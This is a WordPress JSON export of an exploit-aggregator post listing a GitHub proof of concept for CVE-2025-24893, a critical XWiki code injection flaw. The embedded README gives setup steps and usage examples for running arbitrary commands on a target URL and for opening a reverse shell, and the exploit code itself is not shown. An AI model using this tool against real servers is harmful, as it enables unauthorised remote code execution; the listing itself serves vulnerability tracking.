{"id":10529,"date":"2025-08-13T04:43:42","date_gmt":"2025-08-13T04:43:42","guid":{"rendered":"http:\/\/localhost\/?p=10529"},"modified":"2025-08-13T04:43:42","modified_gmt":"2025-08-13T04:43:42","slug":"exploit-for-code-injection-in-xwiki","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=10529","title":{"rendered":"Exploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3"},"content":{"rendered":"

{“lastseen”:”2025-08-13T08:36:42″,”description”:”# CVE-2025-24893\\n\\nInstall bun:\\n\\n“`bash\\ncurl -fsSL https:\/\/bun.com\/install | bash\\n“`\\n\\nTo install dependencies:\\n\\n“`bash\\nbun install\\n“`\\n\\nTo run:\\n\\n“`bash\\nbun run CVE-2025-24893.ts\\n“`\\n\\nThis project was created using `bun init` in bun v1.2.19. [Bun](https:\/\/bun.com) is a fast all-in-one JavaScript runtime.\\n\\n## How to use:\\n\\n“`\\nUsage: bun CVE-2025-24893.ts [options]\\n\\nOptions:\\n -u, –url The target URL to interact with.\\n -i, –ip The IP address for a reverse shell connection.\\n -p, –port The port number for the reverse shell.\\n -r, –rverse Open a reverse shell connection.\\n -c, –cmd Execute a specific command.\\n\\nExamples:\\n # Execute a command on a target URL\\n bun CVE-2025-24893.ts –url http:\/\/example.com –cmd \\”ls -la\\”\\n\\n # Open a reverse shell\\n bun CVE-2025-24893.ts –rverse –ip 127.0.0.1 –port 4444\\n“`\\n\\n## Disclaimer\\n\\nThis exploit and guide are for educational purposes only. Use this information responsibly and only on systems you have explicit permission to test. Unauthorized exploitation of systems is illegal and unethical. The authors and contributors are not responsible for any misuse or damage caused by this information.\\n”,”published”:”2025-08-07T22:34:07″,”modified”:”2025-08-09T13:28:35″,”type”:”githubexploit”,”title”:”Exploit for Code Injection in Xwiki”,”source”:””,”references”:””,”id”:”E5B5FB6C-FB47-5B80-9C21-F45B725632D3″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-24893″],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/github.com\/Th3Gl0w\/CVE-2025-24893-POC”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-08-13T08:36:42″,”description”:”# CVE-2025-24893\\n\\nInstall bun:\\n\\n“`bash\\ncurl -fsSL https:\/\/bun.com\/install | bash\\n“`\\n\\nTo install dependencies:\\n\\n“`bash\\nbun install\\n“`\\n\\nTo run:\\n\\n“`bash\\nbun run CVE-2025-24893.ts\\n“`\\n\\nThis project was created using `bun init` in bun v1.2.19. [Bun](https:\/\/bun.com) is a…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,32,13,7,11,5],"class_list":["post-10529","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-githubexploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nExploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=10529\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-08-13T08:36:42″,”description”:”# CVE-2025-24893nnInstall bun:nn“`bashncurl -fsSL https:\/\/bun.com\/install | bashn“`nnTo install dependencies:nn“`bashnbun installn“`nnTo run:nn“`bashnbun run CVE-2025-24893.tsn“`nnThis project was created using `bun init` in bun v1.2.19. [Bun](https:\/\/bun.com) is a...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=10529\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-13T04:43:42+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10529#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10529\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Exploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3\",\"datePublished\":\"2025-08-13T04:43:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10529\"},\"wordCount\":350,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"githubexploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=10529#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10529\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10529\",\"name\":\"Exploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-08-13T04:43:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10529#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=10529\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10529#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Exploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=10529","og_locale":"en_US","og_type":"article","og_title":"Exploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3 - zero redgem","og_description":"{“lastseen”:”2025-08-13T08:36:42″,”description”:”# CVE-2025-24893nnInstall bun:nn“`bashncurl -fsSL https:\/\/bun.com\/install | bashn“`nnTo install dependencies:nn“`bashnbun installn“`nnTo run:nn“`bashnbun run CVE-2025-24893.tsn“`nnThis project was created using `bun init` in bun v1.2.19. [Bun](https:\/\/bun.com) is a...","og_url":"https:\/\/zero.redgem.net\/?p=10529","og_site_name":"zero redgem","article_published_time":"2025-08-13T04:43:42+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=10529#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=10529"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Exploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3","datePublished":"2025-08-13T04:43:42+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=10529"},"wordCount":350,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","githubexploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=10529#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=10529","url":"https:\/\/zero.redgem.net\/?p=10529","name":"Exploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-08-13T04:43:42+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=10529#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=10529"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=10529#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Exploit for Code Injection in Xwiki_E5B5FB6C-FB47-5B80-9C21-F45B725632D3"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/10529","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10529"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/10529\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10529"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10529"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10529"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}